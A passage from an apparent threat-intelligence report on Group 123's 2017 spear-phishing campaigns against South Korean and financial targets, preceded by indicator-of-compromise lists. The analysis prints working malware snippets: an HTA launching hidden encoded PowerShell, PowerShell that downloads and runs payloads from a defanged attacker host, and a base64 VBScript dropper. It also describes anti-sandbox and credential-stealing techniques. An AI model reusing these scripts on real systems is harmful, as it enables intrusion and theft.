                  • rep[.]pe-wok[.]biz
                  Files and or directories created
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\X1IF8CSM\report[1].txt
                  • %AppData%\Mozilla\Firefox\Profiles\1lcuq8ab.default\new_cookies.sqlite
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\X1IF8CSM\dll_x86[1].bin
                  • \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\dll_service[1].bin
                  • \net\NtControlPipe10
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\report[1].txt
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\TQM3V6S2\dll_service[1].bin
                  • \winlogonrpc
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\Google\Chrome\Application\winhttp.dll
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\AdService\AdService.dll
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\ip[1]
                  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\track_dre[1].php
                  • \Users\Administrator\AppData\Local\AdService\AdService.dll
                  File Hashes
                  • 73ed012536499f859ac55c2fb0017e65255f2462f13b663ed1d85e552c13740b
                  • b6b43b0e6488b384a3ad695ceb1d6b576910ce721079346cfd1d12dd9eea5108
                  • 043d07796535fa5f9ee2bd33139d442c824b5e251471f8d4b54c8f15bc2d0165
                  • 4d094bb5a93660f8e897ce8f191089cd9f76af8b6dd806fc2681acf2a3d70f38
                  • 0bb012ff4961c880d3df768e1374ae4bafeabf453dd3d7ae2d4065bc58f52bcf
                  • d083fbd8b7f1ad561aaaceabfcc601616ed3fdbf076ff845bef53fd178ca6a34
                  • 3389df5d81737fec0e3eeb43c94e2210a14b4227b88c94d7fcff32474d38a19f
                  • 34e4890aaf63d57d686cbb8c9722f5bdef9a41fb127b56d895c5bd87b7ce92ba
                  • ebba38b2a422277646ea55484f41cd919d0bd2d619e8d45bfd9585aac8986369
                  • 51243602a1bb3c7784373c17b430ff2491d1679ae6e169175c45907f0313b76b
                  • 078baebe5ee2cadda00cd0142280a7bd1034494e79819f16d22a4fe961b3dc84
                  • e134c3dd3e4e39e6c6a373416f5969ec56dfb90c53b6ba847dcfc4f7626de995
                  • b5d5a2cc7f8a796009674981f60c76fb99eb6cceb6a19f276e13c0ce9b22ef4c
                  • 45b6a109d001e4dc2e66d4570c19384d7aa44332e906feef739649b9ebc77bb0
                  • 89e5effdd6426658db77526775b5ddb6f51487dbd80f7f55e79c2fce32a8abea
                  • 026764bc699841080691463758db461d64138343a310b918bac027cf67ffaf34
                  • aecf6184c2b620a198f0415a16d6ae824f09df25bbc310b24edfbf5ee0b7c3a5
                  • 04fafb357ccdd1f9aac6db2c62ae274f58f6fb5b569b10f15e3b3a94fc1ae899
                  • 115767f49767127544b6365e2551f5b3977af593b222619d8ebe1603b550a4e1
                  • b5da35a9a483d86c19d4d450006698d2bd6c41b9eaa9783d563e1522c6ef11a4

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella







                  Win.Trojan.Zusy-6417556-0


                  Indicators of Compromise


                  Registry Keys
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                    • Value: DFF7E57F
                  • <HKU>\S-1-5-21-2580483871-590521980-3826313501-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                    • Value: internat.exe
                  Mutexes
                  • N/A
                  IP Addresses
                  • N/A
                  Domain Names
                  • N/A
                  Files and or directories created
                  • %AppData%\Roaming\DFF7E57F\bin.exe
                  • %WinDir%\setupact.log
                  File Hashes
                  • 02d99600a3bc049905479aaf281baa9611e3116ac1055cf90f5af317f2abee7d
                  • 0546853f1fa7e7715f1f80e8d544f19055b9c118672d8fe07843b3bcc9b5a212
                  • 0571a872f9ae83ad0c1a618cd702e4804bef66dc75771d12d0d343086b692edb
                  • 05d0bd7260555bed0b868b76e03bfc2e7b667fb50f6b2926a57e06eca75bd948
                  • 0820695810d62160ede23b19ae1a9a28955136b79122c6fea4e316508241ee8a
                  • 08764af08c10eadace45a49d3a9d77ddcd815a9bb5f6a00b25d09f161b9ce799
                  • 08e5be88de6cd4a641747552eee45a7f4a77e30afc514447c2e3b95ebf2f348e
                  • 0a089121a2c7e5fcfb86a1ed4ed7f60e0e7d0a795294d0de3c96869ec94f0d46
                  • 0b025f4e1d6521bc0ab29c4ea6ac2e32dc26585dbb367389e550229c0db783a8
                  • 0c19771b538e6bcc23afc97d52763f0cdc95aeb5329acb03697f235dbc93611b
                  • 0c7e05eccf846610557f9a5ca087ff4842cb7973850e6f6da4fa28e5973a365a
                  • 0d9a1563b9f7aa42224cc8148741e54f040fbf566fdab0f7c121a8b015e24ee3
                  • 0eba1ccd4bd977ad336204abf2dd6757828ff13d7bc3ebaca3ed9a9eab275951
                  • 0efdd84b7916529809d3facfe81897f2f03b239cef6899ae501386acbc8a8e04
                  • 0f04e601a9cf2a9f6cb422a257c3616f0a8b9884de52dd3f6a0ac944ded2a435
                  • 0f0560851aa49ff627a08246af165ba0af6b1be58058b8f9c675bd758f606b68
                  • 12f52ad98e75c8d57a457b6b4e02767da04ce051ef7abc59ac975c45358d2cc6
                  • 17006395b5609f935fea89d8186649ba59a1b1ae2ff19437c85420d5ca5315c5
                  • 197fa42138b01d074fdac0c5eee8a3aa67baaa26fe243a293e5e7eb57f37d384
                  • 1b609587a5a8896a37087737e481d79d4a097e3a1a75d46c5f0bf408c8561280
                  • 1c74cbf79258ca7906b431f4f6efeefc085d66b5032bcad4ec7a9b3960ae9b8f
                  • 1e470e2602e1bcc9c2470c4a375008b3493c181a3e659df5bdf22fc62382d851
                  • 1e5b4e6b02aea1d466b2851583a2c7102083a9c0288f580e9fd8606136003a17
                  • 1ebddb51a2cbce90cdaab17cad42dd3178109bdeaaf342bcb02d82e48992c8f8
                  • 2391a31b7dc07f209a6039044a1d0f11bfcb3b628716b6f842e959f7e90042e8

                  Coverage


                  Screenshots of Detection

                  AMP


                  ThreatGrid



                  Korea In The Crosshairs

                  $
                  0
                  0
                  This blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.

                  A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean targets.

                  Executive Summary


                  This article exposes the malicious activities of Group 123 during 2017. We assess with high confidence that Group 123 was responsible for the following six campaigns:

                  • "Golden Time" campaign.
                  • "Evil New Year" campaign.
                  • "Are you Happy?" campaign.
                  • "FreeMilk" campaign.
                  • "North Korean Human Rights" campaign.
                  • "Evil New Year 2018" campaign.

                  On January 2nd of 2018, the "Evil New Year 2018" was started. This campaign copies the approach of the 2017 "Evil New Year" campaign.

                  The links between the different campaigns include shared code and compiler artifacts such as PDB (Program DataBase) patterns which were present throughout these campaigns.

                  Based on our analysis, the "Golden Time", both "Evil New Year" and the "North Korean Human Rights" campaigns specifically targeted South Korean users. The attackers used spear phishing emails combined with malicious HWP documents created using Hancom Hangul Office Suite. Group 123 has been known to use exploits (such as CVE-2013-0808) or scripting languages harnessing OLE objects. The purpose of the malicious documents was to install and to execute ROKRAT, a remote administration tool (RAT). On occasion the attackers directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes: the document only contained a downloader designed to download ROKRAT from a compromised web server.

                  Additionally, the "FreeMilk" campaign targeted several non-Korean financial institutions. In this campaign, the attackers made use of a malicious Microsoft Office document, a deviation from their normal use of Hancom documents. This document exploited a newer vulnerability, CVE-2017-0199. Group 123 used this vulnerability less than one month after its public disclosure. During this campaign, the attackers used 2 different malicious binaries: PoohMilk and Freenki. PoohMilk exists only to launch Freenki. Freenki is used to gather information about the infected system and to download a subsequent stage payload. This malware was used in several campaigns in 2016 and has some code overlap with ROKRAT.

                  Finally, we identified a 6th campaign that is also linked to Group 123. We named this 6th campaign "Are You Happy?". In this campaign, the attackers deployed a disk wiper. The purpose of this attack was not only to gain access to the remote infected systems but to also wipe the first sectors of the device. We identified that the wiper is a ROKRAT module.




                  This actor was very active this year and continued to mainly focus on South Korea. The group leveraged spear phishing campaigns and malicious documents the contents of which included very specific language suggesting that they were crafted by native Korean speakers rather than through the use of translation services. The actor has the following demonstrated capabilities:

                  • To include exploits (for Hangul and Microsoft Office) in its workflows.
                  • To modify its campaigns by splitting the payload in to multiple stages
                  • To use compromised web servers or legitimate cloud based platforms.
                  • To use HTTPS communications to make it harder to perform traffic analysis.
                  • To compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei university in the "Golden Time" campaign).
                  • To constantly evolve, the new fileless capability included in 2018 is a proof.


                  The Timeline


                  Here is the timeline for 2017 and the beginning of 2018:


                  August 2016 to March 2017: "Golden Time" Campaign


                  As with the majority of Group 123 campaigns, the initial attack vector during this campaign was spear phishing. Talos identified two different kinds of emails. The first email we discovered was the most interesting. In this sample, we observed the attackers praising the user for joining a panel related to the "Korean Reunification and North Korean Conference". The text in the email explained that the recipient should complete the attached document to provide necessary feedback. This appears to be a non-existent conference. The closest match we identified related to any Unification conference was held in January 2017, which was the NYDA Reunification conference. The sender was 'kgf2016@yonsei.ac.kr' which is the contact email of the Korea Global Forum, a separate conference.

                  When we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP associated with the Yonsei University network. We believe that the email address was compromised and abused by the attackers to send the email used in this campaign.

                  The filename for the malicious attachment translates as 'Unification North Korea Conference _ Examination Documents' which reinforces the text in the email about the reunification conference. For an added bonus, in the body of the email, the attacker even suggests that people who completed the document would get paid a 'small fee'. Perhaps the gift of embedded malware is the payment:


                  Much less effort was used to craft the second email Talos analyzed. The email was from a free Korean mail service provided by Daum, Hanmail, indicating that there was no attempt to try to appear as if it originated from an official body or person, unlike the previous email described. The subject was simply 'Request Help' while the attachment filename was 'I'm a munchon person in Gangwon-do, North Korea'. We suspect the attacker was trying to generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a unified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.

                  A second email contained a story about a person called 'Ewing Kim' who was looking for help:

                  The email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808). This vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a payload from the Internet. The first email displays the following decoy document to the infected user and download the following payload:

                  • hxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg


                  The second email displays the following decoy document to the infected user and downloads the following payload:

                  • hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg

                  In both cases, the downloaded payload is the ROKRAT malware.

                  The first tasks of this variant of ROKRAT is to check the operating system version. If Windows XP is detected, the malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems running Windows XP machines. Additionally it checks to determine if common analysis tools are currently running on the infected system. If it detects the presence of these tools, the malware performs two network requests to legitimate websites:

                  • hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg
                  • hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4

                  The Amazon URL displays a WWII game called 'Men of War' while the Hulu URL attempts to stream a Japanese anime show called 'Golden Time':



                  One of the identifying characteristics of ROKRAT is the fact that it uses social network and cloud platforms to communicate with the attackers. These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample:


                  November 2016 to January 2017: "Evil New Year" Campaign


                  In the early part of 2017, Group123 started the "Evil New Year" campaign. In this campaign the actors tried to fool victims by pretending the emails were from the Korean Ministry of Unification and that they offered Korean-specific analysis. This campaign began with a handful of spear phishing emails to South Korean targets and containing malicious attachments. Group123 further attempted to entice victims to open the attachments by using common Hancom Hangul documents. Hancom's Hangul is a popular Office Suite used primarily in the Korean peninsula. The use of Hangul office documents has the advantage of being the norm for the Korean peninsula. If the attacker used Microsoft documents, it may have raised suspicions in the victim. Given the regional file format used there is a chance that some security software suites may not handle them well, and this may have provided an evasion case for the attacker.

                  The documents sent to the targets were titled "Analysis of "Northern New Year in 2017" and used the official logo of the Korean Ministry of Unification. This is a simple choice for the actor to make, but it further shows their familiarity with the region.



                  The document claimed to discuss the New Year's activities of North Korea and this would have been something that the victims in South Korea would be very interested in. This would have been particularly true for Government targets, who we believe to be Group123's target of choice.

                  This document was a decoy aimed to entice the user to open malicious documents embedded further down the page

                  The actor embedded two additional links and the document urged the user to click on these links for more information about New Year's activities in North Korea. The first link was labeled as "Comparison of Major Tasks in '16 & '17" and the second link was identified as "Comparison between '16 & '17".

                  Upon opening these links the user was presented with a further decoy Hangul document. This document was well written and further increases our confidence that we are dealing with a new Korean actor. These documents contained malicious OLE objects used to drop binaries.



                  This time, however, they contained malicious OLE (Object Link Embedded) objects.



                  Initial analysis confirmed two similarly sized OLE object files within this document which appeared to be the same from an execution point of view.

                  The two dropped binaries were stored and executed in this location during our analysis:

                  • C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (2).exe
                  • C:\Users\ADMINI~1\AppData\Local\Temp\Hwp (3).exe

                  Initial analysis showed some sloppy cleaning up from Group123, which we used later to determine that separate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:

                  • e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb

                  The second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into this process. The shellcode is embedded within the resource 'BIN' and is used to unpack another PE32 binary and use wscript.exe to execute it. To do this, Group123 uses a well-known technique that harnesses VirtualAllocEx(), WriteProcessMemory() and CreateRemoteThread() Windows API calls.

                  The new PE32 unpacked from the shellcode is an initial reconnaissance malware which is used to communicate with the C2 infrastructure to obtain the final payload. The information this malware collected included the following:

                  • The computer name
                  • The username
                  • The execution path of the sample
                  • The BIOS model
                  • A randomly-generated ID to uniquely identify the system


                  Group123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b) someone they could infect further based on the information obtained from the reconnaissance phase.

                  Further network analysis showed that the binary attempted to connect to the following URLs:

                  • www[.]kgls[.]or[.]kr/news2/news_dir/index.php
                  • www[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg

                  Korean Government Legal Services (KGLS) is a legitimate Korean government body that manages Korean government legal affairs. By compromising the KGLS, the attacker gained a trusted platform from which to execute an attack.

                  The initial network connection is to 'index.php'. This connection transmits the information gathered during the reconnaissance phase. The attacker uses this information to then determine the specific filename (based on the random ID) to serve to the infected victim. In our case this was 02BC6B26 - this meant a file "02BC6B26_put.jpg" was created for us on the attackers C2. This file is then dropped and renamed 'officepatch.exe' on the victim's machine. Because the attacker was careful about who they attacked, we were unable to obtain this file during our analysis.

                  During our investigation we were able to identify additional Command and Control infrastructure used by this actor. Four C2s were observed, based in the following countries:

                  • 3 C2 in South Korea
                  • 1 C2 in the Netherlands


                  Here is a global map of the identified infrastructure:



                  Contrary to the previous campaign, the attackers separated the reconnaissance phase from the main ROKRAT payload. This trick was likely used to avoid detection. This is an interesting adaptation in Group 123's behavior.

                  March 2017: "Are You Happy?" Campaign


                  In March 2017, Group 123 compiled a disk wiper. The malware contains 1 function, the purpose is to open the drive of the infected system (\\.\PhysicalDrive0) and write the following data to the MBR:



                  You can see the "Are you Happy?" string in the written buffer. After writing to the MBR, the malware reboots the machine with the following command: c:\windows\system32\shutdown /r /t 1

                  After the reboot, the MBR displays the following string to the user:



                  The link to the other campaigns was the following PDB path:

                  • D:\HighSchool\version 13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb

                  As you can see, it perfectly matches the ROKRAT PDB. This wiper is a ROKRAT module named ERSP.enc. We assume that ERSP means ERaSePartition. This module can be downloaded and executed on demand by Group 123.

                  This sample is interesting considering the attack in December 2014 against a Korean power plant where the message that was displayed by the wiper was "Who Am I?".

                  May 2017: "FreeMilk" Campaign


                  This campaign targeted non-Korean financial institutions, but unlike the other campaigns, this one does not use HWP documents. It instead uses Office documents. This change is because Group 123 did not target South Korea during this campaign and Microsoft Office is standard in the rest of the world.

                  Infection Vectors


                  The attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA document inside of Microsoft Office. The URL used can be found in the embedded OLE object:

                  hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]

                  Here is the source code of the downloaded HTA document:

                  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

                  <html xmlns="http://www.w3.org/1999/xhtml">
                  <head>
                  <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />

                  <title>Bonjour</title>
                  <script language="VBScript">
                  Set owFrClN0giJ = CreateObject("Wscript.Shell")
                  Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
                  If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
                  owFrClN0giJ.Run "powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQBvA[...redacted...]H0AIAA=" ,0
                  owFrClN0giJ.Run "cmd /c echo hta>%tmp%\webbrowser1094826604.tmp", 0
                  End If
                  Self.Close
                  </script>
                  <hta:application
                  id="oHTA"
                  applicationname="Bonjour"
                  application="yes"
                  >
                  </head>
                  </html>
                  Once decoded using the base64 algorithm, we are able to read the final payload:
                  $c=new-object System.Net.WebClient
                  $t =$env:temp
                  $t1=$t+"\\alitmp0131.jpg"
                  $t2=$t+"\\alitmp0132.jpg"
                  $t3=$t+"\\alitmp0133.js"

                  try
                  {
                  echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1)
                  $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2)
                  $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3)
                  wscript.exe $t3
                  }
                  catch
                  {
                  }
                  The purpose of this script is to download and execute a Windows script and two encoded payloads. The script is used to decode and execute the following payloads:

                  • Appach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.
                  • Appach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.

                  PoohMilk Analysis


                  The PoohMilk sample is designed to perform two actions:

                  • Create persistence to execute the Freenki sample at the next reboot.
                  • Check specific files on the infected machine.

                  The first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file previously downloaded. The file is executed with the argument: "help". Here is the registry creation:



                  The registry location where persistence is achieved is: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update. At the next reboot, the malware will be executed.

                  The second action is to check if the file "wsatra.tmp" exists in the temporary directory of the current user. If this file exists, the content is read in order to obtain a path to find a second file with the LNK (link) extension. The LNK file is finally used to identify a third file: a ZIP file. The file will be inflated in order to retrieve a RTF document, this document will be displayed to the infected user by executing Wordpad.

                  Here is the PDB path from the PoohMilk sample:

                  • E:\BIG_POOH\Project\milk\Release\milk.pdb

                  Freenki Sample


                  The purpose of Freenki is to collect information on the infected system and to download a third executable.

                  This sample can be executed with 3 different arguments:

                  • "Help": the value configured by PoohMilk. In this context the main function is executed.
                  • "Console": with the argument, a persistence is configured and the malware will be executed at the next reboot ( HKCU\Software\Microsoft\Windows\CurrentVersion\Run\runsample ).
                  • "Sample": with this argument, the malware executes the console command followed by the help command.

                  The information collected is performed using WMI queries:



                  Additionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:

                  • hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php
                  • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)

                  The downloaded third payload is obfuscated using the same technique. The file is a fake image starting with "PNGF".

                  November 2017: "North Korean Human Rights" Campaign


                  In November 2017, Talos observed the latest Group123 campaign of the year, which included a new version of ROKRAT being used in the latest wave of attacks. Group 123 again used one of their main calling cards, the malicious HWP document. This time, Group 123 used a document containing information in relation to a meeting held on 1st November in Seoul, South Korea. This document was alleged to have been written by a legal representative claiming to be representing the "Citizens' Alliance For North Korean Human Rights And Reunification Of Korean Peninsula". Group 123 once again uses information related to the Korean unification and now are claiming to highlight concerns related to human rights issues.

                  The document brought Talos a new gift - a new version of ROKRAT. Following on with the normal Group 123 activity the document was written in perfect Korean text and dialect again suggesting the origin of this group is from the Korean peninsula.



                  Further analysis of the document text allowed us to understand the context. The document mentions 'Community of North Korean human rights and unification' with the lawyer claiming to be part of the "Citizen's Alliance for North Korean Human Rights and North-South unification". The main purpose of this document was an attempt to arrange a meeting to discuss items related to "North Korean Human Rights Act" and "Enactment of a Law" which was passed in 2016 in South Korea. We believe that the document was attempting to target stakeholders within the '올인통' community in an attempt to entice them to join the discussion in an attempt to work on additional ideas related to these activities. The meeting was due to take place on November 1, 2017 and this document was trying to garner additional interest prior to the meeting.

                  Once again Group 123 leveraged the use of OLE objects within the HWP document. Analysis starts with a zlib decompression (a standard action of HWP documents) and we're able to recover the following script:
                  const strEncode = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hV[...redacted...]AAAAAAAAAAAAAAAAAAAAAA="
                  DIM outFile
                  DIM base64Decoded
                  DIM shell_obj
                  SET shell_obj = CreateObject("WScript.Shell")
                  DIM fso
                  SET fso = CreateObject("Scripting.FileSystemObject")
                  outFile = "c:\ProgramData\HncModuleUpdate.exe"
                  base64Decoded = decodeBase64(strEncode)
                  IF NOT(fso.FileExists(outFile)) then
                  writeBytes outFile, base64Decoded
                  shell_obj.run outFile
                  END IF
                  WScript.Quit()
                  private function decodeBase64(base64)
                  DIM DM, EL
                  SET DM = CreateObject("Microsoft.XMLDOM")
                  SET EL = DM.createElement("tmp")
                  EL.DataType = "bin.base64"
                  EL.Text = base64
                  decodeBase64 = EL.NodeTypedValue
                  end function
                  private Sub writeBytes(file, bytes)
                  DIM binaryStream
                  SET binaryStream = CreateObject("ADODB.Stream")
                  binaryStream.Type = 1
                  binaryStream.Open
                  binaryStream.Write bytes
                  binaryStream.SaveToFile file, 1
                  End Sub
                  This script is executed and is used to decode a static base64 string within the strEncode variable. Using base64 encoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This is the ROKRAT dropper. Talos suspect the filename may have been selected to make it appear within running processes as a potential Hancom updater.

                  The dropper is used to extract a new resource named SBS. This specific resource contains malicious shellcode used by the malware. Additionally we see a cmd.exe process launched and used for process injection using the VirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of ROKRAT they continue to use similar Windows APIs. The following graph view from IDA shows these steps.



                  These execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into the cmd.exe process.

                  One of Group 123 oddities in this campaign was to drop the following picture as a decoy image to the user. This image shows various publicly available images which look to be related to the Korean 'Independence Movement' and appear to be related to the Korean war.



                  We began performing further in-depth analysis on this new version of ROKRAT and this is where we started to notice some similarities with Group 123s "Evil New Years" campaign. The similitudes are discussed later in this paper.


                  This ROKRAT variant contained anti-sandbox techniques. This is performed by checking if the following libraries are loaded on the victim machine.

                  • SbieDll.dll (sandboxie library)
                  • Dbghelp.dll (Microsoft debugging tools)
                  • Api_log.dll (threatAnalyzer / GFI SandBox)
                  • Dir_watch.dll (threatAnalyzer / GFI SandBox)



                  We were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group 123 used an anti-debugging technique related to NOP (No Operation).



                  nop dword ptr [eax+eax+00h] is a 5 byte NOP. But this opcode is not correctly supported by some debugging tools, Immunity Debugger for example, will replace the assembly by "???" in red making it difficult to attempt to debug.

                  This version of ROKRAT came with a Browser Stealer mechanism which was similar, with a few modifications, to that used in the FreeMilk campaign using Freenki malware in 2016.

                  Group 123 continued their use of Cloud platforms with this campaign, this time leveraging pCloud, Dropbox, Box and Yandex.

                  Finally here is the PDB of the sample used during this campaign:

                  • d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb


                  January 2018: "Evil New Year 2018" Campaign


                  As we observed at the beginning of 2017, Group 123 started a campaign corresponding with the new year in 2018. This campaign started on the 2nd of January. The infection vector was a malicious HWP document:



                  This decoy document is an analysis of the 2018 New Year speech made by the leader of North Korea. The approach is exactly the same as what was seen in 2017 using a new decoy document. This document was alleged to have been written by the Ministry of Reunification as demonstrated by the logo in the top left.

                  Similar to the "Golden Time" campaign, this document exploits an EPS vulnerability in order to download and execute shellcode located on a compromised website:

                  • hxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png


                  The fake image usage is a common pattern for this group. This image contains shellcode used to decode the embedded final payload: ROKRAT. This ROKRAT variant is loaded from memory. It's a fileless version of ROKRAT. This behavior shows that Group 123 is constantly evolving to avoid detection. As usual, the ROKRAT sample uses cloud providers to communicate with the operator, this time leveraging Yandex, pCloud, Dropbox and Box.

                  Links Between Campaigns


                  Code Sharing


                  Talos has identified that Group 123 shares code between different malware. Several features are shared in the samples mentioned in this article; however we will cover only two in this article: the reconnaissance phase and the browsers stealer.

                  Reconnaissance Phase


                  The ROKRAT samples used during the two "Evil New Year" and the "North Korean Human Rights" campaigns contained a reconnaissance phase. In the "Evil New Year" campaign the payload was split into two parts, the first part contained the reconnaissance code. In the other campaign the reconnaissance phase was directly included in the main payload. This code is the same.

                  The malware uses the following registry key to get the machine type: HKLM\System\CurrentControlSet\Services\mssmbios\Data\SMBiosData. The "System manufacturer" value is used to identify the type of machine. The code appears to be based on a forum post (rohitab.com) describing the use of the Win32 APIs used. The source code only considers the following machine types:

                  default:   lpString = "(Other)";               break;
                  case 0x02: lpString = "(Unknown)"; break;
                  case 0x03: lpString = "(Desktop)"; break;
                  case 0x04: lpString = "(Low Profile Desktop)"; break;
                  case 0x06: lpString = "(Mini Tower)"; break;
                  case 0x07: lpString = "(Tower)"; break;
                  case 0x08: lpString = "(Portable)"; break;
                  case 0x09: lpString = "(Laptop)"; break;
                  case 0x0A: lpString = "(Notebook)"; break;
                  case 0x0E: lpString = "(Sub Notebook)"; break;
                  The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.

                  It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the "Golden Time" campaign.

                  Brower Stealer


                  For the first time, the ROKRAT sample used during the "North Korean Human Rights" contained a browser credentials stealer. The code used to perform this task in the same that found within in a Freenki sample deployed in 2016.

                  The malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and Firefox, the malware queries the sqlite database containing the URL, username and password:



                  Additionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:



                  On the left, we have the ROKRAT sample and on the right the FreeMilk sample. You can see that in addition to the code, the author copy-pasted English typos such as "IE Registery":


                  PDB Paths


                  We can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in this article.

                  ROKRAT:

                  • e:\Happy\Work\Source\version 12\T+M\Result\DocPrint.pdb (from the "Evil New Year" campaign)
                  • d:\HighSchool\version 13\2ndBD\T+M\T+M\Result\DocPrint.pdb (from the "North Korean Human Rights" campaign
                  • D:\HighSchool\version 13\First-Dragon(VS2015)\Sample\Release\DogCall.pdb (ROKRAT Sample from an unidentified campaign from June)
                  Wiper:

                  • D:\HighSchool\version 13\VC2008(Version15)\T+M\T+M\TMProject\Release\ErasePartition.pdb (From the "Are You Happy?" campaign)

                  Summary Graph


                  Here is a graph to visualize the similarities and differences between each campaign mentioned in this article:


                  Conclusion


                  South Korea is becoming an important target for malicious actors and the techniques used are becoming specific to the region (for example: use of native language to try and ensure the targets feel that the information, document or email being sent to them has added legitimacy). In a specific campaign, this actor took time to compromise multiple legitimate Korean platforms including Yonsei and the KGLS in order to forge the spear phishing campaign or to host the command and control. This approach is not common with less advanced actors and demonstrates a high level of maturity and knowledge of the Korean region.

                  However Group 123's activities are not limited to South Korea. For international targets, they are able to switch to a more standard attack vector such as using Microsoft Office documents as opposed to the specific HWP documents used when targeting victims located in Korea. Group 123 does not hesitate to use public exploits and scripting languages to drop and execute malicious payloads. We can notice that this group uses compromised legitimate websites (mainly Wordpress) and cloud platforms to communicate with the infected systems. This approach makes it difficult to detect communications through analysis of these network flows. Even if the arsenal of this actor is diverse, we have identified some patterns, copy-paste code from various public repositories and similarities between the different piece of code. In addition to the Remote Administration Tools, we identified a wiper. We conclude that this group was involved in a campaign of intelligence gathering and finally attempted destruction.

                  With our current knowledge of this actor, we predict that they will not disappear anytime soon and will continue to be active during the coming years. Group 123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates. We also believe their target profile may change but for now it will mostly focus on Korean peninsula targets, however, as explained their capabilities will likely continue to evolve over time as they further refine their TTPs.

                  IOCs


                  "Golden Time" Campaign:


                  Maldoc #1 sha256: 7d163e36f47ec56c9fe08d758a0770f1778fa30af68f39aac80441a3f037761e
                  Maldoc #2 sha256: 5441f45df22af63498c63a49aae82065086964f9067cfa75987951831017bd4f
                  ROKRAT #1: cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c
                  ROKRAT #1: 051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00


                  Network:
                  Malicious URLs:
